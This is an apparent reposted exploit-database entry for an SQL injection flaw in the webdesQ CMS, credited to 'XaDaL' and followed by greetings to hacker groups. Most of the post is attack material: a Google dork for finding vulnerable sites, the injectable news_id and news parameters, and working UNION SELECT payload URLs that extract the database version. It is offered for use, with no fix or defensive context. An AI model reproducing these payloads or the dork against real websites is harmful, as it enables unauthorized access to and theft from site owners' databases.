|    |    |    | Today: 22-Nov-2019 |

webdesQ sql injection vulnerability

July 4, 2011 | Posted in ExploitAlert

#Exploit Title: webdesQ sql injection vulnerability
#Date:02/07/2011
#Author:XaDaL
#Software Link: http://www.webdesq.nl/
#Tested on: windows xp
#google dork: inurl: "powered by webdesQ"



#########################################################
/EXPLOIT


http://[localhost]/index.php?id=26&news_id=[SQLI]

http://[localhost]/index.php?id=26&news=[SQLI]

/EXAMPLE:

http://[localhost]/index.php?id=62&news_id=2127 union select
1,2,3,4,5,6,7--

http://[localhost]/index.php?id=24&news=166 union select
1,version(),3,4,5,6,7--


##########################################################

Thank's to: xr0b0t
,kaMtiez,1bliez,jundab,boebefa,ulow,ryanaby,kampret0,hmei7

#virgi,hakz,dr.CruZz,geni212,red robot ,a17z,rj-45,anharku,jos_ali_joe

#arianom,tukulesto,cimpli,contrex,t3ll0,

#all members magelangcyber team,indonesiancoder and indonesian hacker


for aya "i love u " :*

Taged in: injection, vulnerability, webdesq